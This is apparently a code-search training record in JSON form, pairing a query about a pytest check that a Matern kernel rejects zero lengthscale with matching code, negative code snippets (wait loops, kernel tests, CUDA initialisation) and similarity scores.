{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def busyWait(self):\n time.sleep(0.0)", "def waitForCompletion(self):\n\n while(json.loads(self.robot.device())['state']!=0):\n time.sleep(0.1)\n continue\n\n return", "def wait(self):\n time.sleep(0.010)", "def wait(self):\n pass", "def wait(self):\n pass", "def waitUntilFinished():", "def waitUntilFinished():", "def waitUntilFinished():", "def waitUntilFinished():", "def wait():\n pass", "def do_wait(self):\n pass", "def wait():\n time.sleep(1)", "def wait(self):\n\t\traise NotImplementedError(\"must be redeclared\")", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def wait(self):\n\t\twhile True:\n\t\t\tr1 = self.zaberSend(self.translation[\"hor\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tr2 = self.zaberSend(self.translation[\"ver\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tif r1[2] == 0 and r2[2] == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\ttime.sleep(.01)", "def run_and_wait():\n self.busy.put(True)\n action()\n self.busy.put(False)\n status._finished(success=True)", "def wait(self):\n time.sleep(self.next())", "def wait_progress(self):\n pass", "def wait_progress(self):\n pass", "def _busy_wait(self):\n wait_for = GPIO.HIGH\n if self.inky_version == 2:\n wait_for = GPIO.LOW\n\n while(GPIO.input(self.busy_pin) != wait_for):\n pass", "def waitfor(self):\r\n finished = False\r\n while finished == False:\r\n time.sleep(5)\r\n finished = self.isFinished()", "def wait(self, cycles):\n\t\tpass", "def block_waiting( self ):\n while self.num_waiting > 0:\n time.sleep( 1 )", "def wait(self, timeoout=None, state=\"C-completed\"):", "def _wait_for_completion(self):\n if self.do_timing:\n self.timer.start(\"Running.\")\n\n while self.state != State.COMPLETED:\n self._update_state()\n\n if self.do_timing:\n self.timer.stop()", "def wait(self):\n self.event.wait()", "async def wait_until_done(self) -> None:\n ...", "def wait(self):\n while not self.done:\n self.device._handle_events(1000)", "def wait(self, ms=None):\r\n util.raiseNotDefined()", "def wait_complete(self):\n self.join()", "def waitUntilSuccess():", "def wait(self):\n self.mainloop().wait()", "def wait_completion(self):\r\n self.tasks.join()", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait(self):\n return # this method might be obsolete since wait counter is no longer used and the ai counter is handled elsewhere.\n\n #the jump method could go in Being as well.", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait_forever(self):\r\n while True:\r\n time.sleep(0.5)", "def answer_waiting_call(self) -> None:", "def wait(self):\r\n self.scheduler.wait()", "def wait_until_idle(self):\n while True:\n time.sleep(self.__interface.WT_STATE_LOOKUP)\n\n if not self.is_busy:\n break", "def wait(self):\n self.drain_call_queue()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def waitReady(self, spin_delay=0.01):\n while not self.isReady():\n time.sleep(spin_delay)", "def wait(self):\n with self.__lock:\n while not self.__complete:\n self.__lock.wait()", "def busy(self):\n pass", "def wait_for_completion(self, timeout=10):\n cur_status = self.runtime_status()\n while cur_status not in ['FAILED', 'KILLED', 'FINISHED']:\n time.sleep(0.2)\n timeout -= 0.2\n cur_status = self.runtime_status()\n if timeout < 0:\n break\n\n return timeout > 0", "def wait_until_ready(self):\n while not self.is_ready():\n time.sleep(0.01)", "def wait(self):\n time.sleep(self.pause_time)", "def wait(cls, quad):\n\t\twait_time = cls.get_address_value(quad.result)\n\t\ttime.sleep(wait_time/1000.0)", "def _wait(self,):\n #modlogger.debug( \"%s: waiting\"%self)\n self.closing = True\n with self.not_complete_lock:\n if not self.not_complete: return\n self._checkpoint()", "def _busy_wait(self, timeout=40.0):\n # If the busy_pin is *high* (pulled up by host)\n # then assume we're not getting a signal from inky\n # and wait the timeout period to be safe.\n if self._gpio.input(self.busy_pin):\n warnings.warn(\"Busy Wait: Held high. Waiting for {:0.2f}s\".format(timeout))\n time.sleep(timeout)\n return\n\n # If the busy_pin is *low* (pulled down by inky)\n # then wait for it to high.\n t_start = time.time()\n while not self._gpio.input(self.busy_pin):\n time.sleep(0.01)\n if time.time() - t_start >= timeout:\n warnings.warn(\"Busy Wait: Timed out after {:0.2f}s\".format(time.time() - t_start))\n return\n\n # print(\"Busy_waited\", time.time()-t_start, \"out of\", timeout, \"seconds\")", "def wait(delay=2):\n time.sleep(delay)", "def wait(self):\n self.queue.join()", "def waitStatus(j, wtype='Load'):\n timeout = 1\n curIter = 0\n maxIter = 60\n done = False\n while not done:\n stat = j.GetStatus(wtype)\n if stat == \"complete\":\n done = True\n else:\n curIter = curIter + 1\n if curIter > maxIter:\n raise ValueError(\"timeout waiting\")\n time.sleep(timeout)", "def wait(self) -> None:\n\n self.event_.wait()", "def wait(self):\r\n self.jobs.join()", "def wait_for_acquisition(self):\n self.lib.WaitForAcquisition()", "def _wait_ready(self):\n command = self._recv_from_client()\n while command != \"READY\":\n command = self._client.recv_from_client()", "def busy_wait(self, seconds):\n end_time = time.perf_counter() + seconds\n while(time.perf_counter() < end_time):\n pass", "def _wait_while_busy(self, timeout=2):\n\t\tprinted = False\n\t\tstart_timestamp = time()\n\t\twhile self.samba.read_word(self.regs_base_address + self.FSR_OFFSET) & self.FSR_MASK['FRDY'] == 0:\n\t\t\tif not printed:\n\t\t\t\tself.LOG.debug('Flash busy')\n\t\t\t\tprinted = True\n\t\t\tif time() - start_timestamp >= timeout:\n\t\t\t\traise Exception('Flash busy: timeout. FSR: ' + str(self.samba.read_word(self.regs_base_address + self.FSR_OFFSET)))\n\t\t\tsleep(.001)\n\n\t\tif printed:\n\t\t\tself.LOG.debug('Flash was busy for {:.3f}s'.format(time() - start_timestamp))", "def wait_spinner(self, wait_time):\n#------affichage d'un element du cycle dans la boucle\n#----- pour montré qu'on attend \n spinner = itertools.cycle(['-', '/', '|', '\\\\'])\n \n try:\n self.logger.debug(u\"wait for max '%s' minute(s)\"%wait_time) \n time.sleep(1.0)\n#-------------------on attend que le device ne soit plus en MOVING ou on attend un period de temps \n end_time = datetime.datetime.now()+datetime.timedelta(minutes=wait_time)\n while end_time >= datetime.datetime.now() and self._ismoving():\n time.sleep(0.1)\n #affichage l'element du cycle\n sys.stdout.write(spinner.next())\n sys.stdout.flush()\n #-----effacer l'element affiché\n sys.stdout.write('\\b')\n except Exception, details :\n self.error_message.set_error_message(\"Wait error : \",str(details))\n raise", "def wait(wait_time=WAIT_TIME):\n # time.sleep(wait_time)\n pass", "def in_waiting(self) -> int:\n pass", "def wait(wait_time):\n\n time.sleep(wait_time)", "def wait_finish(self):\r\n self.proc.join()", "def wait(self, timeout=60, use_pos=False):\n dmov = self.get_pvobj(\"done_moving\")\n if not use_pos and dmov.isinitialized:\n return dmov.wait_for_value(1, timeout)\n else:\n monpv = self.get_pvobj(\"readback\")\n goal = self.get_par(\"drive\")\n deadband = self.get_par(\"retry_deadband\")\n min = goal - abs(deadband)\n max = goal + abs(deadband)\n return monpv.wait_for_range(min, max, timeout)", "def wait_for_trigger(self):\n # Read the status only to determine when the trigger occurs.\n is_running = True\n is_triggered = False\n while is_running and not is_triggered:\n status = self.hat.a_in_scan_status()\n is_running = status.running\n is_triggered = status.triggered", "def wait(self):\n for _ in range(15):\n time.sleep(10)\n if self.ready:\n break\n else:\n raise RuntimeError('timeout, lease failed to start')", "def block(self):\n while self.running:\n time.sleep( 1 )", "def wait(self, wait_timeout=10):\n if self._TransferInitiated == 0:\n return\n Error = \"DMA wait timed out.\"\n with timeout(seconds = wait_timeout, error_message = Error):\n while True:\n if libdma.XAxiDma_Busy(self.DMAengine,self.direction) == 0:\n break", "def wait(self, _id):\n while not self._actions[_id].done:\n sleep(1e-3)", "def wait(self) -> None:\n now = time.time()\n if now < self.lockTime:\n diff = self.lockTime - now\n logger.debug(\"Waiting %ss to avoid ratelimit\", diff)\n time.sleep(diff)", "def wait(self,c,time,loop):\r\n\r\n if loop==1:\r\n loopBool=True\r\n else:\r\n loopBool=False\r\n \r\n self.board.setupWait( time['ns'], loopBool)", "def wait(self):\n\t\tself.wait_window(self)\n\t\treturn self.result", "def wait_till_read_out():\n\n\trespond = send_command('waitreadout')", "def wait(self, sleep_time):\n time.sleep(sleep_time)", "def wait_for(func):\n \n while not func() and not rospy.is_shutdown():\n time.sleep(0.01)", "def _wait_before_call(self):\n while (dt.datetime.now() - self._last_call_ts) <= dt.timedelta(\n seconds=self.api_timeout\n ):\n time.sleep(0.5)\n self._last_call_ts = dt.datetime.now()", "def state_wait_do(cfg, app, win, events):", "def finishWait(self):\r\n self.scheduler.finishWait()", "def wait(self):\n return self.bot_client.send_command(_Command.Wait)" ]
[ "0.7729015", "0.7684526", "0.76390046", "0.7526746", "0.7526746", "0.7480899", "0.7480899", "0.7480899", "0.7480899", "0.7460632", "0.7429611", "0.7353933", "0.73518384", "0.7336683", "0.7308061", "0.7302214", "0.72688043", "0.7262008", "0.7262008", "0.72150105", "0.7173207", "0.7164182", "0.716261", "0.7159663", "0.7087422", "0.7077602", "0.7065622", "0.7051149", "0.7040757", "0.70143384", "0.69953376", "0.6968196", "0.6950926", "0.6903484", "0.68987846", "0.68937594", "0.68937594", "0.68937594", "0.687671", "0.68592966", "0.6836301", "0.68308175", "0.6787925", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6763656", "0.67460495", "0.6731589", "0.672541", "0.6715848", "0.66851085", "0.666257", "0.66620004", "0.6656871", "0.6643195", "0.6606989", "0.6606071", "0.65940464", "0.6582737", "0.65803266", "0.6551968", "0.65477926", "0.6545195", "0.65271795", "0.6516402", "0.64975697", "0.64969116", "0.6476622", "0.64642596", "0.64592457", "0.6456851", "0.6452134", "0.64497423", "0.64458376", "0.6441303", "0.6433484", "0.64332896", "0.6402093", "0.6386441", "0.63817495", "0.6373843", "0.63711035", "0.6370706", "0.63447106" ]
0.8239064
8
Test that initializing a Matern1/2 kernel with 0 lengthscale raises an exception
def test_matern_zero_lengthscale(matern): with pytest.raises(ValueError) as exp: matern(lengthscale=0.0, variance=1.0, output_dim=1) assert exp.value.args[0].find("lengthscale must be positive.") >= 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def testZeroInput(self):\n nb.rescale_length(2.0)\n nb.rescale_length(0)\n self.assertEqual(2.0, nb.rscale)", "def testZeroInput(self):\n self.assertRaises(TypeError, nb.rscale,)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv1DTranspose(output_channels=1)", "def test_nonpositive_nu_raises_exception(nu):\n with pytest.raises(ValueError):\n kernels.Matern(input_dim=1, nu=nu)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv2DTranspose(output_channels=1)", "def test_gauss_kernel():\n\n gauss = gauss_kernel(2, 5)\n\n assert gauss.shape == (5, 5)\n assert gauss[2, 2] == 0.039788735772973836", "def init_kernel(cls, m):\n pass", "def testKernelShape(self):\n\n snt.Conv3D(output_channels=10, kernel_shape=[3, 4, 5], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=3, name=\"conv1\")\n\n with self.assertRaisesRegexp(snt.Error, \"Invalid kernel shape.*\"):\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3, 3, 3], name=\"conv1\")", "def testKernelShape(self, use_bias):\n\n snt.Conv1D(output_channels=10, kernel_shape=[3], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")", "def testNoFeatureColumnsOrKernelMappers(self):\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier()", "def testKernelShape(self, use_bias):\n\n snt.Conv2D(output_channels=10, kernel_shape=[3, 4], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv2D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv2D(output_channels=10,\n kernel_shape=[3, 3, 3],\n name=\"conv1\")", "def test_fixedkernel(self):\r\n X = np.random.rand(30, 4)\r\n K = np.dot(X, X.T)\r\n kernel = GPy.kern.fixed(4, K)\r\n kern = GPy.kern.poly(5, degree=4)\r\n self.assertTrue(GPy.kern.kern_test(kern, verbose=verbose))", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv2D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3, 4],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv2D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv2D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3],\n use_bias=use_bias)", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv1D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv1D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3, 3\\], must be either a \"\n r\"positive integer or an iterable of positive integers of \"\n r\"size 1\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv1D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3, 3],\n use_bias=use_bias)", "def test_nu_large_recovers_rbf_kernel(x0: np.ndarray, x1: np.ndarray, input_dim: int):\n lengthscale = 1.25\n kernmat_rbf = kernels.ExpQuad(lengthscale=lengthscale, input_dim=input_dim)\n kernmat_matern = kernels.Matern(lengthscale=lengthscale, nu=15, input_dim=input_dim)\n np.testing.assert_allclose(\n kernmat_rbf(x0, x1),\n kernmat_matern(x0, x1),\n err_msg=\"RBF and Matern kernel are not equivalent for nu=infty.\",\n rtol=0.05,\n atol=0.01,\n )", "def testInvalidKernelMapper(self):\n\n class DummyKernelMapper(object):\n\n def __init__(self):\n pass\n\n feature = layers.real_valued_column('feature')\n kernel_mappers = {feature: [DummyKernelMapper()]}\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier(\n feature_columns=[feature], kernel_mappers=kernel_mappers)", "def __init__(self, dim): #, length_scale, length_scale_bounds=()):\n# assert isinstance(column, (list, tuple, int)), \"must be int or list of ints\"\n# self.column = [column] if isinstance(column, int) else column\n# assert all(isinstance(i, int) for i in self.column), \"must be integers\"\n self.dim = dim\n \n kernels = [Projection([c]) for c in range(dim)]\n\n # combine the kernels into a single product kernel\n self.kernel = reduce(lambda k0, k1 : k0 * k1, kernels)", "def testNegativeInput(self):\n nb.rescale_length(2.0)\n nb.rescale_length(-1.0)\n self.assertEqual(2.0, nb.rscale)", "def testKernelShape(self, use_bias):\n\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3, 4])\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=3)\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3],\n use_bias=use_bias, name=\"conv1\")", "def __init__(self,\n batch_size,\n max_num_context,\n x_size=1,\n y_size=1,\n l1_scale=0.6,\n sigma_scale=1.0,\n random_kernel_parameters=True,\n kernel = 'SE', #valid options {SE,PER}\n testing=False):\n self._batch_size = batch_size\n self._max_num_context = max_num_context\n self._x_size = x_size\n self._y_size = y_size\n self._l1_scale = l1_scale\n self._sigma_scale = sigma_scale\n self._random_kernel_parameters = random_kernel_parameters\n self._testing = testing\n self._kernel = kernel", "def test_conv2d_out_of_range_scale():\n np.random.seed(0)\n\n input_sc = 1024\n kernel_sc = 1024\n output_sc = 1\n\n model, _ = _get_model(\n (1, 4, 4, 4),\n 1,\n 1,\n 0,\n input_sc,\n 0,\n kernel_sc,\n 0,\n output_sc,\n \"none\",\n (1, 1),\n (1, 1),\n 1,\n \"uint8\",\n 8,\n \"HWIO\",\n )\n model = tei.make_ethosn_composite(model, \"ethos-n.qnn_conv2d\")\n mod = tei.make_ethosn_partition(model)\n\n expected_err_msg = (\n \"Overall scale (of the input * weights / output) should be in the range (2^-32, 65536)\"\n )\n tei.test_error(mod, {}, expected_err_msg)", "def __init__(self, kernel_size):\r\n super().__init__()\r\n self.kernel_size = kernel_size", "def __init__(self, kernel_size):\r\n super().__init__()\r\n self.kernel_size = kernel_size", "def init():\n\tN = np.int32(DIM) #prepare for stitching\n\t#HII_DIM = np.int32(HII_DIM)\n\tf_pixel_factor = DIM/HII_DIM;\n\tscale = np.float32(BOX_LEN)/DIM\n\tHII_scale = np.float32(BOX_LEN)/HII_DIM\n\tshape = (N,N,N)\n\t\n\tMRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=0)\n\n\tkernel_source = open(cmd_folder+\"/initialize.cu\").read()\n\tkernel_code = kernel_source % {\n\n\t\t'DELTAK': DELTA_K,\n\t\t'VOLUME': VOLUME,\n\t\t'DIM': DIM\n\t}\n\tmain_module = nvcc.SourceModule(kernel_code)\n\tinit_kernel = main_module.get_function(\"init_kernel\")\n\tHII_filter = main_module.get_function(\"HII_filter\")\n\tadj_complex_conj = main_module.get_function(\"adj_complex_conj\")\n\tsubsample_kernel = main_module.get_function(\"subsample\")\n\tvelocity_kernel = main_module.get_function(\"set_velocity\")\n\tpspec_texture = main_module.get_texref(\"pspec\")\n\n\tinterpPspec, interpSize = init_pspec() #interpPspec contains both k array and P array\n\tinterp_cu = cuda.matrix_to_array(interpPspec, order='F')\n\tcuda.bind_array_to_texref(interp_cu, pspec_texture)\n\n\tlargebox_d = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d, np.int32(DIM), block=block_size, grid=grid_size)\n\n\t#import IPython; IPython.embed()\n\tlargebox_d_imag = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d_imag, np.int32(DIM), block=block_size, grid=grid_size)\n\n\tlargebox_d *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d_imag *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d = largebox_d + np.complex64(1.j) * largebox_d_imag\n\n\t#adj_complex_conj(largebox_d, DIM, block=block_size, grid=grid_size)\n\tlargebox = largebox_d.get()\n\t#np.save(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox)\n\n\t#save real space box before smoothing\n\tplan = Plan(shape, dtype=np.complex64)\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tnp.save(parent_folder+\"/Boxes/deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox_d.real.get_async())\n\n\t#save real space box after smoothing and subsampling\n\t# host largebox is still in k space, no need to reload from disk\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tHII_filter(largebox_d, N, ZERO, smoothR, block=block_size, grid=grid_size);\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tsubsample_kernel(largebox_d.real, smallbox_d, N, HII_DIM, PIXEL_FACTOR, block=block_size, grid=HII_grid_size) #subsample in real space\n\tnp.save(parent_folder+\"/Boxes/smoothed_deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(HII_DIM, BOX_LEN), smallbox_d.get_async())\n\n\t# reload the k-space box for velocity boxes\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\t\n\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tlargevbox_d = gpuarray.zeros((DIM,DIM,DIM), dtype=np.complex64)\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tfor num, mode in enumerate(['x', 'y', 'z']):\n\t\tvelocity_kernel(largebox_d, largevbox_d, DIM, np.int32(num), block=block_size, grid=grid_size)\n\t\tHII_filter(largevbox_d, DIM, ZERO, smoothR, block=block_size, grid=grid_size)\n\t\tplan.execute(largevbox_d, inverse=True)\n\t\tlargevbox_d /= scale**3\n\t\t#import IPython; IPython.embed()\n\t\tsubsample_kernel(largevbox_d.real, smallbox_d, DIM, HII_DIM,PIXEL_FACTOR, block=block_size, grid=HII_grid_size)\n\t\tnp.save(parent_folder+\"/Boxes/v{0}overddot_{1:d}_{2:.0f}Mpc\".format(mode, HII_DIM, BOX_LEN), smallbox_d.get())\n\n\treturn", "def test_first_level_with_no_signal_scaling():\n shapes, rk = [(3, 1, 1, 2)], 1\n fmri_data = list()\n design_matrices = list()\n design_matrices.append(pd.DataFrame(np.ones((shapes[0][-1], rk)),\n columns=list(\n 'abcdefghijklmnopqrstuvwxyz')[:rk])\n )\n # Check error with invalid signal_scaling values\n with pytest.raises(ValueError,\n match=\"signal_scaling must be\"):\n FirstLevelModel(mask_img=False, noise_model='ols',\n signal_scaling=\"foo\")\n\n first_level = FirstLevelModel(mask_img=False, noise_model='ols',\n signal_scaling=False)\n fmri_data.append(Nifti1Image(np.zeros((1, 1, 1, 2)) + 6, np.eye(4)))\n\n first_level.fit(fmri_data, design_matrices=design_matrices)\n # trivial test of signal_scaling value\n assert first_level.signal_scaling is False\n # assert that our design matrix has one constant\n assert first_level.design_matrices_[0].equals(\n pd.DataFrame([1.0, 1.0], columns=['a']))\n # assert that we only have one theta as there is only on voxel in our image\n assert first_level.results_[0][0].theta.shape == (1, 1)\n # assert that the theta is equal to the one voxel value\n assert_almost_equal(first_level.results_[0][0].theta[0, 0], 6.0, 2)", "def test_kernel_matrix(kernel, sample):\n sample = [ele for ele in sample] # consumed several times\n\n potato = KernelMethod(kernel)\n mat = potato.matrix(sample)\n assert np.all(np.linalg.eigvals(mat) > 0) or np.isclose(\n [np.min(np.linalg.eigvals(mat))], [0]\n )", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def kernel_test(slabs, data, backend):\n Q = data[:, 0]\n\n layers = []\n for thickness, rsld, isld, sigma in slabs:\n layers.append(\n model.Layer(\n b=(rsld - 1j * isld), dens=0.1, d=thickness, sigma=sigma\n )\n )\n layers.reverse()\n stack = model.Stack(Layers=list(layers[1:-1]), Repetitions=1)\n sample = model.Sample(\n Stacks=[stack], Ambient=layers[-1], Substrate=layers[0]\n )\n # print(sample)\n\n inst = model.Instrument(\n probe=backend,\n wavelength=1.54,\n coords=\"q\",\n I0=1,\n res=0,\n restype=\"no conv\",\n respoints=5,\n resintrange=2,\n beamw=0.1,\n footype=\"no corr\",\n samplelen=10,\n pol=\"uu\",\n )\n if data.shape[1] == 4:\n dQ = data[:, 3]\n inst.restype = \"full conv and varying res.\"\n inst.res = dQ\n if backend == \"neutron pol spin flip\":\n # memory issues in matrix formalism if too many data points\n inst.respoints = 101\n else:\n inst.respoints = (\n 10001 # try to use same convolution as ref1d when generating\n )\n inst.resintrange = 3.5\n\n # print(inst)\n R = sample.SimSpecular(Q, inst)\n\n assert R.shape == data[:, 1].shape\n if data.shape[1] == 4:\n # validation accuracy is reduced for resolution runs, as strongly\n # depends on numerical convolution scheme\n if backend == \"neutron pol spin flip\":\n np.testing.assert_allclose(R, data[:, 1], rtol=0.005)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)", "def test_MKDADensity_kernel_instance_with_kwargs(testdata_cbma):\n kern = MKDAKernel(r=2)\n meta = MKDADensity(kern, kernel__r=6, null_method=\"montecarlo\", n_iters=10)\n\n assert meta.kernel_transformer.get_params().get(\"r\") == 2", "def __init__(self, columns): #, length_scale, length_scale_bounds=()):\n# assert isinstance(column, (list, tuple, int)), \"must be int or list of ints\"\n# self.column = [column] if isinstance(column, int) else column\n# assert all(isinstance(i, int) for i in self.column), \"must be integers\"\n self.columns = columns \n\n kernels = [Projection([c]) for c in columns]\n #factor_name(c)) for c in columns]\n \n # collect all the kernels to be combined into a single product kernel\n super(SimpleFactorKernel, self).__init__(kernels)", "def init_stitch(N):\n\tif N is None:\n\t\tN = np.int32(HII_DIM) #prepare for stitching\n\tMETA_GRID_SIZE = DIM/N\n\tM = np.int32(HII_DIM/META_GRID_SIZE)\n\t#HII_DIM = np.int32(HII_DIM)\n\tf_pixel_factor = DIM/HII_DIM;\n\tscale = np.float32(BOX_LEN/DIM)\n\tprint 'scale', scale\n\tHII_scale = np.float32(BOX_LEN/HII_DIM)\n\tshape = (DIM,DIM,N)\n\tstitch_grid_size = (DIM/(block_size[0]),\n\t\t\t\t\t\tDIM/(block_size[0]),\n\t\t\t\t\t\tN/(block_size[0]))\n\tHII_stitch_grid_size = (HII_DIM/(block_size[0]),\n\t\t\t\t\t\tHII_DIM/(block_size[0]),\n\t\t\t\t\t\tM/(block_size[0]))\n\t#ratio of large box to small size\n\tkernel_source = open(cmd_folder+\"/initialize_stitch.cu\").read()\n\tkernel_code = kernel_source % {\n\n\t\t'DELTAK': DELTA_K,\n\t\t'DIM': DIM, \n\t\t'VOLUME': VOLUME,\n\t\t'META_BLOCKDIM': N\n\t}\n\tmain_module = nvcc.SourceModule(kernel_code)\n\tinit_stitch = main_module.get_function(\"init_kernel\")\n\tHII_filter = main_module.get_function(\"HII_filter\")\n\tsubsample_kernel = main_module.get_function(\"subsample\")\n\tvelocity_kernel = main_module.get_function(\"set_velocity\")\n\tpspec_texture = main_module.get_texref(\"pspec\")\n\tMRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=0)\n\tplan2d = Plan((np.int64(DIM), np.int64(DIM)), dtype=np.complex64)\n\tplan1d = Plan((np.int64(DIM)), dtype=np.complex64)\n\tprint \"init pspec\"\n\tinterpPspec, interpSize = init_pspec() #interpPspec contains both k array and P array\n\tinterp_cu = cuda.matrix_to_array(interpPspec, order='F')\n\tcuda.bind_array_to_texref(interp_cu, pspec_texture)\n\t#hbox_large = pyfftw.empty_aligned((DIM, DIM, DIM), dtype='complex64')\n\thbox_large = np.zeros((DIM, DIM, DIM), dtype=np.complex64)\n\t#hbox_small = np.zeros(HII_shape, dtype=np.float32)\n\t#hbox_large = n\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\n\t# Set up pinned memory for transfer\n\t#largebox_hs = cuda.aligned_empty(shape=shape, dtype=np.float32, alignment=resource.getpagesize())\n\tlargebox_pin = cuda.pagelocked_empty(shape=shape, dtype=np.float32)\n\tlargecbox_pin = cuda.pagelocked_empty(shape=shape, dtype=np.complex64)\n\n\tlargebox_d = gpuarray.zeros(shape, dtype=np.float32)\n\tlargebox_d_imag = gpuarray.zeros(shape, dtype=np.float32)\n\tprint \"init boxes\"\n\tfor meta_z in xrange(META_GRID_SIZE):\n\t\t# MRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=meta_x*N**3)\n\t\tinit_stitch(largebox_d, DIM, np.int32(meta_z),block=block_size, grid=stitch_grid_size)\n\t\tinit_stitch(largebox_d_imag, DIM, np.int32(meta_z),block=block_size, grid=stitch_grid_size)\n\t\tlargebox_d *= MRGgen.gen_normal(shape, dtype=np.float32)\n\t\tlargebox_d_imag *= MRGgen.gen_normal(shape, dtype=np.float32)\n\t\tlargebox_d = largebox_d + np.complex64(1.j) * largebox_d_imag\n\t\tcuda.memcpy_dtoh_async(largecbox_pin, largebox_d)\n\t\thbox_large[:, :, meta_z*N:(meta_z+1)*N] = largecbox_pin.copy()\n\t#if want to get velocity need to use this\n\tif True:\n\t\tprint \"saving kbox\"\n\t\tnp.save(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN), hbox_large)\n\n\tprint \"Executing FFT on device\"\n\t#hbox_large = pyfftw.interfaces.numpy_fft.ifftn(hbox_large).real\n\thbox_large = fft_stitch(N, plan2d, plan1d, hbox_large, largebox_d).real\n\tprint hbox_large.dtype\n\tprint \"Finished FFT on 